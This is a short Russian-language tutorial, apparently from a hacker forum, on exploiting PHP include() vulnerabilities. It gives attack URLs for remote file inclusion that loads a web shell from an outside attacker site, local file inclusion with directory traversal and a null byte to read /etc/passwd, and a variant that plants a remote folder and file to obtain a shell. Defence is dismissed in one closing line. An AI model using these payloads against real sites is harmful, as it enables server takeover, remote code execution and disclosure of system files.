Проведение php иньеций Пхп иньекция самая распространеная среди кретических уязвимостей после Sql иньекции Рассмотрим самый шоколадный вариант PHP: <? {какой то код} include("$do.php") {какой то код} ?> По сути это грубейшая ошибка програмиста, многие встречались с линками такого вида: Код: http://somesite.ru/index.php?do=xaker Если при подстановки вместо значеня = xaker, значения =blablabla, мы получаем что нибудь типа: Код: Warning: main(blablabla.php): failed to open stream: No such file or directory in /home/user/www//page.php on line 3 Warning: main(blablabla.php): failed to open stream: No such file or directory in /home/user/www/page.php on line 3 Warning: main(): Failed opening 'blablabla.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/share/pear') in /home/user/www/page.php on line 3 то уязвимость класса пхп иньекция обнаружена Пробуем подставить вместо blablabla ссылку на сайт с вебшелом http://realhaker.ru/evilshell Без расширения И вот он вебшелл Рассмотрим локальный инкулд PHP: <? [кодъ] Include ("files/$do.htm"); [кодъ] ?> Можно просмотреть файлы на сервере. Возможность просмотра файлов с расширением отличным от .htm нам дает старая, мало где встречающаяся бага с нулевым байтом Код: http://somesite.ru/index.php?do=../index.php%00 http://somesite.ru/index.php?do=../../etc/passwd.htm нам так же неподходит ,ибо такого нет Код: http://somesite.ru/index.php?do=../../etc/passwd%00 Этот тип иньекции по прежнему достаточно распространен Рассмотрим самый поганый случай PHP: <? {кодъ} Include ("$some/folder/do.php"); {кодъ} ?> Но все не так страшно как может показаться, на удаленном сервере мы организуем папку folger и do.php в ней Создаем и прописываем Код: http://somesite.ru/index.php?some=путь до шела вот он вебшелл Вообщем то существуют стандартные методы защиты от этой чумы, их легко найти в пабе